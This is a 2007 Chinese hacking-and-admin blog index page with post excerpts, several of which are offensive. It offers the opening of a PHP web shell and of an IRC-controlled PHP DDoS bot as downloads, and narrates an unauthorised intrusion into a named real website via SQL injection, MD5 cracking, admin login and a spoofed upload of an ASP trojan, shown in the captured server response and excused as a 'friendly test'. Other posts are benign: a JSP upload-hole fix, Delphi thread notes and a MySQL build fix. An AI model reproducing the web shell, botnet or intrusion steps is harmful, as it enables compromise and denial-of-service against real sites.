公告板
安徽电信nod32升级服务器
服务器地址:http://eset.corbie.com.cn
本站重新开放注册,大家赶快下有用的资源....
nod32服务器升级即时信息统计系统地址:http://corbie.9966.org
客户端下载地址: http://www.corbie.com.cn/nod32.rar
预览模式: 普通 | 列表

shell.php

作者:Corbie 日期:2007-12-16 15:23

<coolcode lang="php"download="shell.php"> <?php
error_reporting(7);
//设定错误讯息回报的等级
ob_start();
//打开缓冲区,当缓冲区激活时,所有来自PHP程序的非文件头信息均不会发送,而是保存在内部缓冲区。为了输出缓冲区的内容,可以使用ob_end_flush()或flush()输出缓冲区的内容。
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];
@set_time_limit(0);
//非安全模式可以使用上面的函数,超时取消。

[阅读全文]

标签: corbie,php
类别: 技术教程 | 引用: 0 | 评论: 0 | 阅读: 383 | 打印 | 打包 | 转发

PHP DDoS Bot

作者:Corbie 日期:2007-12-16 15:18

<coolcode lang="php"download="DDOS.php"> <?php
/*
PHP ddos bot
Version 1.0
*/
$server="1.3.3.7";
$Port="6667";
$nick="bot-";$willekeurig;
$willekeurig=mt_rand(0,3);
$nicknummer=mt_rand(100000,999999);
$Channel="#WauShare";
$Channelpass="ddos";
$msg="Farewell.";

[阅读全文]

类别: 技术教程 | 引用: 0 | 评论: 0 | 阅读: 271 | 打印 | 打包 | 转发

立次存照

作者:Syber 日期:2007-12-14 17:43

  1. InterlockedIncrement
  2.  InterlockedDecrement



只是这里用于增减变量的并不是常用的Inc/Dec过程,而是用了InterlockedIncrement/InterlockedDecrement这一对过程,它们实现的功能完全一样,都是对变量加一或减一。但它们有一个最大的区别,那就是InterlockedIncrement/InterlockedDecrement是线程安全的。即它们在多线程下能保证执行结果正确,而Inc/Dec不能。
标签: delphi thread inc
类别: 技术教程 | 引用: 0 | 评论: 0 | 阅读: 276 | 打印 | 打包 | 转发

puline JSP上传漏洞修复

作者:Corbie 日期:2007-12-14 12:48

漏洞地址:http://www.puline.com/manage/filesystem/upfile_iframe.jsp

漏洞说明:不经过验证直接得到上传地址,并支持各种格式上传.

attachments/200712/4980633911.jpg

解决方法:
在upfile_iframe.jsp head区加上以下代码

下载: head.jsp
  1. <%@ include file="../include/config.jsp" %>
  2. <%@ page session="true" %>
  3. <%@ page import="java.sql.*" %>
  4. <%@ page import="javax.servlet.*" %>
  5. <%@ page import="javax.servlet.http.*" %>
  6. <%@ page language="java" import="puline.*" %>
  7. <%@ page import= "java.text.SimpleDateFormat"%>
  8. <%@ page contentType="text/html;charset=gb2312" %>
  9. <%
  10.  sysproedomclass sysadmin=new sysproedomclass();
  11.  if (!sysadmin.getlogined(session)) {
  12.  response.sendRedirect("../login.jsp");
  13.  }

类别: 技术教程 | 引用: 0 | 评论: 0 | 阅读: 340 | 打印 | 打包 | 转发

成功入侵Web Server: www.nowhelp.cn

作者:Corbie 日期:2007-12-13 21:29

以下是引用片段:

Web Server: www.nowhelp.cn

Soft:GoCom信息平台

2007年12月11日,15点14分。得到网站 "www.nowhelp.cn" 行动起来,分析一下该网站采用asp语言编写,2话不说先闲逛全站,寻找漏洞,寻找注入点,对可疑只处进行手动注入测试,("http://www.nowhelp.cn/xxxx.asp?pid=177 and 1=2") 测试多个均无收获,正在气馁之时,随便乱点几下,哈,运气不错,  尽然暴错,这正是我想要的结果


字符串的语法错误 在查询表达式 'ProClassID=177' Order By IssueTime Desc' 中。

/xxxx.asp,行 22



哈,拿家伙,domain3.6  进一步注入, 如图片,
 
attachments/200712/0163676604.jpg


已猜出密码

密码不是明文,很明显已经通过md5加密,我们进行解密,如图


attachments/200712/9887630286.jpg


我们马上登陆后台,
attachments/200712/2407865530.jpg

试图上传自己的asp木马,恐怕让人失望了,上传文件已被限制,恐怕不能直接上传我们的asp木马,
只能通过其他方式了,
拿出我们的工具 WinSock Expert v0.6 beta1, 进行包分析


attachments/200712/1758794494.jpg


找到上传调用文件,
好,下一步进行欺骗上传,



HTTP/1.1 200 OK
Date: Tue, 11 Dec 2007 07:45:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1169
Content-Type: text/html
Cache-control: private


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>
<body>
<SCRIPT language=javascript>
parent.HtmlEdit.focus();
var range = parent.HtmlEdit.document.selection.createRange();
range.pasteHTML('<img src=../../../UploadFiles/News/2007121115456578.gif>');
if(parent.parent.myform.UploadFiles.value==''){
parent.parent.myform.UploadFiles.value+='../../../UploadFiles/News/2007121115456578.gif';}
else{
parent.parent.myform.UploadFiles.value+='|'+'../../../UploadFiles/News/2007121115456578.gif';}
alert('上传文件成功!');
history.go(-1);
parent.HtmlEdit.focus();
</script><SCRIPT language=javascript>
parent.HtmlEdit.focus();
var range = parent.HtmlEdit.document.selection.createRange();
range.text='[upload=sp ]../../../UploadFiles/News/2007121115456503.asp [/upload]';
if(parent.parent.myform.UploadFiles.value==''){
parent.parent.myform.UploadFiles.value+='../../../UploadFiles/News/2007121115456503.asp ';}
else{
parent.parent.myform.UploadFiles.value+='|'+'../../../UploadFiles/News/2007121115456503.asp ';}
alert('上传文件成功!');
history.go(-1);
parent.HtmlEdit.focus();
</script>
</body>
</html>



attachments/200712/2434801233.jpg
哈,终于上完成

attachments/200712/1849943656.jpg


到了这步,剩下的就花点功夫进行权限提升吧,提权部分我就不多说了,如有问题可直接联系我,
在此声明,本入侵纯属友情检测,并无恶意,本人已把漏洞补好,请该网站管理员注意.


attachments/200712/6902159905.jpg

类别: 技术教程 | 引用: 0 | 评论: 0 | 阅读: 264 | 打印 | 打包 | 转发

php写了一个清除网页木马的小程序。

作者:Syber 日期:2007-12-13 14:02

最近有好几个站被挂马,删除比较麻烦。因为挂马的人经常变换样式。
但是还是有规律可寻,就想到用正则办法匹配。效果还是不错的。

主要原理是历遍目录(包括子目录),正则表达。

[阅读全文]

类别: 技术教程 | 引用: 1 | 评论: 0 | 阅读: 406 | 打印 | 打包 | 转发

入侵!

作者:Corbie 日期:2007-12-11 18:22

Web Server: www.nowhelp.cn

Soft:GoCom信息平台

截图:
attachments/200712/4890718646.jpg

类别: 技术教程 | 引用: 0 | 评论: 0 | 阅读: 267 | 打印 | 打包 | 转发

debian编译mysql 5.0 出现错误的解决方法

作者:Syber 日期:2007-12-11 15:30

apt-get install build-essential

在编译Mysql时
./configure --prefix=DIR

,如果出现了以下错误:
......
checking for tgetent in -ltermcap... no
checking for termcap functions library... configure: error: No curses/termcap library found

说明 curses/termcap 库没有安装
apt-cache search curses | grep lib

安装 libncurses5-dev ,然后重新运行配置
apt-get install libncurses5-dev

类别: 技术教程 | 引用: 0 | 评论: 0 | 阅读: 322 | 打印 | 打包 | 转发

免责声明

本博客立志于收集各类技术资料及技术信息,便于本人和广大网友查询检索,无论公司或个人认为本站存在侵权内容均可与本站联系,任何此类反馈信息一经查明属实后,将立即删除!